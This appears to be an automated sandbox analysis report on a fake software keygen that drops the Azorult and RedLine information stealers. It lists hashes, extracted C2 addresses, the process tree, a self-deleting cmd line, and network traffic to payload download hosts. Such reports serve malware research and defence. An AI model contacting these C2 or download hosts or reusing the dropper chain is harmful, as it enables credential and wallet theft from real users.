Resubmissions

13/01/2022, 13:19 UTC

220113-qkhx6sade2 4

12/09/2021, 07:40 UTC

210912-jhysaacbd3 10

12/09/2021, 07:40 UTC

210912-jhp55sfbbr 10

12/09/2021, 07:39 UTC

210912-jhc6kscbd2 10

12/09/2021, 07:39 UTC

210912-jg161sfbbp 10

12/09/2021, 07:38 UTC

210912-jgmnmafbbn 10

Analysis

  • max time kernel
    1756s
  • max time network
    1772s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    12/09/2021, 07:38 UTC

General

  • Target

    Dot.Tk.123.ticket.keygen.by.CORE.bin.exe

  • Size

    6.2MB

  • MD5

    0cb3efeb5d9312e068c57e7e55affed7

  • SHA1

    aad1c65d257c7d2929ffb916114bc532feba0a16

  • SHA256

    a974231d8889e05fedfbe73b5cc58e414de6fd5031765c998a24ac326f35b0b2

  • SHA512

    236ce9aa9e71f279e7833c4f0afbad15a2de4aaf62e78a82f1132224951f25f0a184aacfe5c963a20481c20cdb12e1a56e6aaf662f4a07c756abe0c539488898

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

redline

Botnet

newmixnew

C2

94.140.115.194:31858

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M16
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dot.Tk.123.ticket.keygen.by.CORE.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Dot.Tk.123.ticket.keygen.by.CORE.bin.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3264
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:420
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2364
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:3740
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:516
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
          keygen-step-6.exe
          3⤵
          • Executes dropped EXE
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2864
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              5⤵
              • Runs ping.exe
              PID:1344
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:596
          • C:\Windows\winnetdriv.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe" 1631432345 0
            4⤵
            • Executes dropped EXE
            PID:2532
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3644
            • C:\Users\Admin\Documents\PlsWnEU2.exe
              "C:\Users\Admin\Documents\PlsWnEU2.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:852

    Network

    • flag-us
      DNS
      kvaka.li
      keygen-step-1.exe
      Remote address:
      8.8.8.8:53
      Request
      kvaka.li
      IN A
      Response
      kvaka.li
      IN A
      185.173.37.179
    • flag-ru
      POST
      http://kvaka.li/1210776429.php
      keygen-step-1.exe
      Remote address:
      185.173.37.179:80
      Request
      POST /1210776429.php HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Host: kvaka.li
      Content-Length: 85
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.14.1
      Date: Sun, 12 Sep 2021 07:39:07 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      X-Powered-By: PHP/7.4.16
      X-Page-Speed: 1.14.36.1-0
      Cache-Control: max-age=0, no-cache
    • flag-us
      DNS
      iplogger.org
      keygen-step-6.exe
      Remote address:
      8.8.8.8:53
      Request
      iplogger.org
      IN A
      Response
      iplogger.org
      IN A
      88.99.66.31
    • flag-de
      GET
      https://iplogger.org/1SWBy7
      keygen-step-6.exe
      Remote address:
      88.99.66.31:443
      Request
      GET /1SWBy7 HTTP/1.1
      Host: iplogger.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 12 Sep 2021 07:39:08 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=njjb7gq7mogndstcpsnvcmvut3; path=/; HttpOnly
      Pragma: no-cache
      Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247615843; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers: 1
      whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
    • flag-us
      DNS
      ip-api.com
      keygen-step-6.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json
      keygen-step-6.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 12 Sep 2021 07:39:07 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 323
      Access-Control-Allow-Origin: *
      X-Ttl: 51
      X-Rl: 43
    • flag-us
      DNS
      evaexpand.com
      keygen-step-6.exe
      Remote address:
      8.8.8.8:53
      Request
      evaexpand.com
      IN A
      Response
      evaexpand.com
      IN A
      185.92.244.225
    • flag-us
      DNS
      detacher.xyz
      KiffAppE2.exe
      Remote address:
      8.8.8.8:53
      Request
      detacher.xyz
      IN A
      Response
      detacher.xyz
      IN A
      195.123.221.77
    • flag-nl
      POST
      https://detacher.xyz/addnew.php
      KiffAppE2.exe
      Remote address:
      195.123.221.77:443
      Request
      POST /addnew.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: detacher.xyz
      Content-Length: 80
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 12 Sep 2021 07:39:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Strict-Transport-Security: max-age=15768000;
    • flag-us
      DNS
      kiff.store
      KiffAppE2.exe
      Remote address:
      8.8.8.8:53
      Request
      kiff.store
      IN A
      Response
      kiff.store
      IN A
      195.123.221.77
    • flag-nl
      GET
      https://kiff.store/links/uploads/PlsWnEU2.exe
      KiffAppE2.exe
      Remote address:
      195.123.221.77:443
      Request
      GET /links/uploads/PlsWnEU2.exe HTTP/1.1
      Host: kiff.store
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 12 Sep 2021 07:39:11 GMT
      Content-Type: application/octet-stream
      Content-Length: 355840
      Last-Modified: Sat, 11 Sep 2021 17:13:24 GMT
      Connection: keep-alive
      ETag: "613ce3b4-56e00"
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Strict-Transport-Security: max-age=15768000;
      Accept-Ranges: bytes
    • flag-us
      DNS
      www.wpdsfds23x.com
      winnetdriv.exe
      Remote address:
      8.8.8.8:53
      Request
      www.wpdsfds23x.com
      IN A
      Response
      www.wpdsfds23x.com
      IN A
      34.231.28.159
    • flag-us
      GET
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      winnetdriv.exe
      Remote address:
      34.231.28.159:80
      Request
      GET /index.php/api/isfull/2 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 76.0.3809.132 Safari / 537.36
      Host: www.wpdsfds23x.com
    • flag-us
      DNS
      api.ip.sb
      PlsWnEU2.exe
      Remote address:
      8.8.8.8:53
      Request
      api.ip.sb
      IN A
      Response
      api.ip.sb
      IN CNAME
      api.ip.sb.cdn.cloudflare.net
      api.ip.sb.cdn.cloudflare.net
      IN A
      104.26.12.31
      api.ip.sb.cdn.cloudflare.net
      IN A
      104.26.13.31
      api.ip.sb.cdn.cloudflare.net
      IN A
      172.67.75.172
    • flag-us
      GET
      https://api.ip.sb/geoip
      PlsWnEU2.exe
      Remote address:
      104.26.12.31:443
      Request
      GET /geoip HTTP/1.1
      Host: api.ip.sb
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 12 Sep 2021 07:39:21 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 285
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Access-Control-Allow-Origin: *
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7SETo%2F0lSWHa0itRbasSaIfI%2B%2BhJPcVyM7W3O6V3QCRTEfLf3owjutdTze25gyh7%2B%2FRlJZOZ87820Kz5rD2BqD5GfoqmThwp826jncL2BHlpmZBnmCAf%2BUsZ5A%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Server: cloudflare
      CF-RAY: 68d77b457d53c867-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-de
      GET
      https://iplogger.org/1SrNy7
      keygen-step-6.exe
      Remote address:
      88.99.66.31:443
      Request
      GET /1SrNy7 HTTP/1.1
      Host: iplogger.org
      Cookie: PHPSESSID=njjb7gq7mogndstcpsnvcmvut3; clhf03028ja=154.61.71.51
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Sun, 12 Sep 2021 07:51:24 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Pragma: no-cache
      Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=247615107; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers: 1
      whoami: c3af235b5b9c8f8c0657cab7c8c85f85d97100c7d13cb4fb6626c667e06b697f
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
    • 185.173.37.179:80
      http://kvaka.li/1210776429.php
      http
      keygen-step-1.exe
      520 B
      526 B
      6
      5

      HTTP Request

      POST http://kvaka.li/1210776429.php

      HTTP Response

      200
    • 88.99.66.31:443
      https://iplogger.org/1SWBy7
      tls, http
      keygen-step-6.exe
      1.1kB
      6.3kB
      15
      11

      HTTP Request

      GET https://iplogger.org/1SWBy7

      HTTP Response

      200
    • 208.95.112.1:80
      http://ip-api.com/json
      http
      keygen-step-6.exe
      294 B
      672 B
      5
      4

      HTTP Request

      GET http://ip-api.com/json

      HTTP Response

      200
    • 185.92.244.225:443
      evaexpand.com
      keygen-step-6.exe
      156 B
      3
    • 195.123.221.77:443
      https://detacher.xyz/addnew.php
      tls, http
      KiffAppE2.exe
      1.1kB
      6.0kB
      11
      11

      HTTP Request

      POST https://detacher.xyz/addnew.php

      HTTP Response

      200
    • 195.123.221.77:443
      https://kiff.store/links/uploads/PlsWnEU2.exe
      tls, http
      KiffAppE2.exe
      7.1kB
      379.2kB
      145
      262

      HTTP Request

      GET https://kiff.store/links/uploads/PlsWnEU2.exe

      HTTP Response

      200
    • 94.140.115.194:31858
      PlsWnEU2.exe
      1.1MB
      22.8kB
      745
      374
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      411 B
      80 B
      4
      2

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 128.116.117.3:443
      tls
      46 B
      66 B
      1
      1
    • 104.26.12.31:443
      https://api.ip.sb/geoip
      tls, http
      PlsWnEU2.exe
      753 B
      4.3kB
      9
      8

      HTTP Request

      GET https://api.ip.sb/geoip

      HTTP Response

      200
    • 128.116.117.3:443
      tls
      46 B
      75 B
      1
      1
    • 34.231.28.159:80
      http://www.wpdsfds23x.com/index.php/api/isfull/2
      http
      winnetdriv.exe
      678 B
      120 B
      5
      3

      HTTP Request

      GET http://www.wpdsfds23x.com/index.php/api/isfull/2
    • 88.99.66.31:443
      https://iplogger.org/1SrNy7
      tls, http
      keygen-step-6.exe
      849 B
      1.3kB
      10
      7

      HTTP Request

      GET https://iplogger.org/1SrNy7

      HTTP Response

      200
    • 205.234.175.102:443
      tls
      138 B
      197 B
      3
      3
    • 205.234.175.102:443
      tls
      92 B
      111 B
      2
      2
    • 8.8.8.8:53
      kvaka.li
      dns
      keygen-step-1.exe
      54 B
      70 B
      1
      1

      DNS Request

      kvaka.li

      DNS Response

      185.173.37.179

    • 8.8.8.8:53
      iplogger.org
      dns
      keygen-step-6.exe
      58 B
      74 B
      1
      1

      DNS Request

      iplogger.org

      DNS Response

      88.99.66.31

    • 8.8.8.8:53
      ip-api.com
      dns
      keygen-step-6.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      evaexpand.com
      dns
      keygen-step-6.exe
      59 B
      75 B
      1
      1

      DNS Request

      evaexpand.com

      DNS Response

      185.92.244.225

    • 8.8.8.8:53
      detacher.xyz
      dns
      KiffAppE2.exe
      116 B
      148 B
      2
      2

      DNS Request

      detacher.xyz

      DNS Request

      detacher.xyz

      DNS Response

      195.123.221.77

      DNS Response

      195.123.221.77

    • 8.8.8.8:53
      kiff.store
      dns
      KiffAppE2.exe
      56 B
      72 B
      1
      1

      DNS Request

      kiff.store

      DNS Response

      195.123.221.77

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
      181 B
      1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      api.ip.sb
      dns
      PlsWnEU2.exe
      55 B
      145 B
      1
      1

      DNS Request

      api.ip.sb

      DNS Response

      104.26.12.31
      104.26.13.31
      172.67.75.172

    MITRE ATT&CK Enterprise v6

    Downloads

    • memory/596-133-0x0000000000A80000-0x0000000000B65000-memory.dmp  (Filesize 916KB)

    • memory/852-174-0x0000000005140000-0x0000000005141000-memory.dmp  (Filesize 4KB)

    • memory/852-170-0x0000000004BF0000-0x0000000004BF1000-memory.dmp  (Filesize 4KB)

    • memory/852-186-0x0000000007680000-0x0000000007681000-memory.dmp  (Filesize 4KB)

    • memory/852-185-0x0000000007420000-0x0000000007421000-memory.dmp  (Filesize 4KB)

    • memory/852-184-0x0000000007450000-0x0000000007451000-memory.dmp  (Filesize 4KB)

    • memory/852-183-0x0000000007300000-0x0000000007301000-memory.dmp  (Filesize 4KB)

    • memory/852-182-0x0000000006CD0000-0x0000000006CD1000-memory.dmp  (Filesize 4KB)

    • memory/852-181-0x0000000006B00000-0x0000000006B01000-memory.dmp  (Filesize 4KB)

    • memory/852-180-0x0000000002764000-0x0000000002766000-memory.dmp  (Filesize 8KB)

    • memory/852-179-0x0000000002763000-0x0000000002764000-memory.dmp  (Filesize 4KB)

    • memory/852-177-0x0000000002760000-0x0000000002761000-memory.dmp  (Filesize 4KB)

    • memory/852-178-0x0000000002762000-0x0000000002763000-memory.dmp  (Filesize 4KB)

    • memory/852-176-0x00000000052D0000-0x00000000052D1000-memory.dmp  (Filesize 4KB)

    • memory/852-167-0x0000000002200000-0x000000000224E000-memory.dmp  (Filesize 312KB)

    • memory/852-168-0x0000000000400000-0x0000000000459000-memory.dmp  (Filesize 356KB)

    • memory/852-169-0x00000000024B0000-0x00000000024D2000-memory.dmp  (Filesize 136KB)

    • memory/852-175-0x0000000005250000-0x0000000005251000-memory.dmp  (Filesize 4KB)

    • memory/852-171-0x0000000002710000-0x0000000002730000-memory.dmp  (Filesize 128KB)

    • memory/852-172-0x0000000005700000-0x0000000005701000-memory.dmp  (Filesize 4KB)

    • memory/852-173-0x0000000002780000-0x0000000002781000-memory.dmp  (Filesize 4KB)

    • memory/2364-160-0x0000000002660000-0x00000000027FC000-memory.dmp  (Filesize 1.6MB)

    • memory/2532-146-0x0000000000400000-0x00000000004E5000-memory.dmp  (Filesize 916KB)

    • memory/2864-126-0x0000000000CE0000-0x0000000000CF8000-memory.dmp  (Filesize 96KB)

    • memory/3644-166-0x000000001BE34000-0x000000001BE35000-memory.dmp  (Filesize 4KB)

    • memory/3644-158-0x0000000000C40000-0x0000000000C41000-memory.dmp  (Filesize 4KB)

    • memory/3644-161-0x000000001BE30000-0x000000001BE32000-memory.dmp  (Filesize 8KB)

    • memory/3644-165-0x000000001BE32000-0x000000001BE34000-memory.dmp  (Filesize 8KB)
